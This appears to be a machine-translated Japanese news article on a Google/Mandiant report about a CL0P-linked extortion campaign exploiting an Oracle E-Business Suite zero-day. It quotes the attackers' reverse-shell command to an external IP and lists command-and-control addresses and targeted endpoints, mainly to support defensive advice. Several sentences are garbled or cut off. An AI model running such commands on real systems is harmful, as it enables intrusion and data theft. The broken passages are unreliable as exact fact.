Googleは、恐喝キャンペーンで「大量の顧客データ」が悪用されたと報告

Googleは、悪意のある人物による大規模な顧客データのtracを報告しました。同社は、この人物が恐喝計画に関与していると主張しています。Google Threat IntelligenceとMandiantは、この窃取活動がCL0P恐喝グループと関連している可能性のある攻撃者によるものであることを tracました。.

Googleの脅威インテリジェンスグループ（GTIG）とMandiantは、OracleのE-Business Suite（EBS）の脆弱性を悪用した大規模な恐喝キャンペーンを明らかにしました。この恐喝キャンペーンにより、大量の顧客データが窃取されました。このキャンペーンは2025年9月29日に開始され、CL0P恐喝ブランドとのつながりを主張するグループが関与していたとMandiantは述べています。.

GoogleとMandiantがゼロデイ攻撃を暴露 

Googleの報告によると、攻撃者は複数の組織の幹部に「大量の」メールを送信し、Oracle EBS環境への侵害を主張し、 身代金を支払わなけれ。 

侵害された数百のサードパーティ アカウントから送信された電子メールには、以前は CL0P データ漏洩サイトにリンクされていた連絡先アドレス [email protected] と [email protected]ました。

GoogleとMandiantの共同調査により、この攻撃活動は2025年7月まで遡り、現在CVE-2025-61882として tracされているゼロデイ脆弱性に関連している可能性があることが判明しました。一部のケースでは、攻撃者が影響を受けた組織から「相当量のデータ」を盗み出したと報告されています。.

オラクルは、悪用された脆弱性は7月に修正済みであると述べましたが、その後、10月4日に追加の脆弱性に対処するための緊急アップデートをリリースしました。オラクルは顧客に対し、最新の重要なパッチアップデートを使用するよう指示し、侵害を防ぐにはすべてのパッチを最新の状態に保つことが不可欠であることを強調しました。.

CL0P恐喝ブランドは2020年から活動しており、歴史的にはサイバー犯罪グループFIN11と関連しています。過去にはMOVEit、GoAnywhere、Accellion FTAなどのマネージドファイル転送システムを標的としていました。これらのキャンペーンは、ゼロデイ脆弱性の大規模な悪用、機密データの盗難、そして数週間後の恐喝という、同様のパターンを辿っていました。. 

作成時点では 報告書この事件による新たな被害者はdent CL0Pのデータ漏洩サイトには、 

複雑な多段階のJavaインプラント

Google とMandiantによる技術的な分析によると、攻撃者はOracle EBSのコンポーネント（UiServletやSyncServletなど）を標的とした複数のエクスプロイトチェーンを用いて、リモートコード実行を実現し、多段階のJavaインプラントを仕込んだことが明らかになった。

2025年7月、/OA_HTML/configurator/UiServletへのHTTPリクエストに関連する不審なアクティビティが発生しました。この不審なアクティビティは、後に「SCATTERED LAPSUS$ HUNTERS」というTelegramグループで明らかになった別のエクスプロイトでも確認されました。 

漏洩したエクスプロイトは、サーバー側リクエストフォージェリ (SSRF)、認証バイパス、XSL テンプレートインジェクションなど、いくつかの高度な手法を使用して標的のサーバーを制御していました。.

2025年8月までに、攻撃者はSyncServletと呼ばれる別のツールを使い、EBSデータベース内で有害なテンプレートを作成し、実行し始めました。これらのテンプレートには、Javaベースのマルウェアを直接メモリにロードするBase64エンコードされたXSLペイロードが含まれていました。. 

dentされたインプラントの中には、攻撃者が制御するコマンド サーバーから第 2 段階のペイロードを取得するダウンローダーである GOLDVEIN.JAVA や、さらなる悪用のために永続的な Java サーブレット フィルターをインストールする SAGE と呼ばれる多層チェーンがありました。.

システムに侵入した後、攻撃者はEBSアカウント「applmgr」を使用してシステムを探索し、ネットワークとシステムの詳細情報を収集し、さらに悪意のあるファイルをインストールしました。また、ip addr、netstat -an、bash -i >& /dev/tcp/200.107.207.26/53 0>&1などのシェルコマンドも使用しました。.

IP アドレス 200.107.207.26 および 161.97.99.49 は悪用の試みでdentされ、162.55.17.215:443 および 104.194.11.200:443 は GOLDVEIN.JAVA ペイロードのコマンド アンド コントロール サーバーとしてリストされていました。.

GTIG は、この作戦を既知のグループと正式に結び付けてはいないが、この作戦は、以前は CL0P ランサムウェアや大規模なデータ窃盗作戦に関与していた、金銭目的のサイバー犯罪グループである FIN11 との類似点がある。. 

マンディアントはまた、恐喝メールを送信するために使用された侵害されたアカウントの1つが以前のFIN11関連の攻撃で使用されていたことも指摘した。.

ユーザーは、EBS データベース テーブル XDO_TEMPLATES_B および XDO_LOBS、特に名前が「TMP」または「DEF」で始まるテーブルを疑い、さらなるデータ窃盗を防ぐために EBS サーバーからの外部インターネット トラフィックをブロックすることが強く推奨されます。.

また、組織は、/OA_HTML/SyncServlet や /OA_HTML/configurator/UiServlet などのエンドポイントへの HTTP リクエストを綿密に監視し、メモリ内の Java ペイロードの証拠を探すためにメモリ ダンプを分析することを推奨しています。.

Google は、CL0P 関連のグループがゼロデイ攻撃の入手にリソースを投入し続けることはほぼ確実だと警告した。.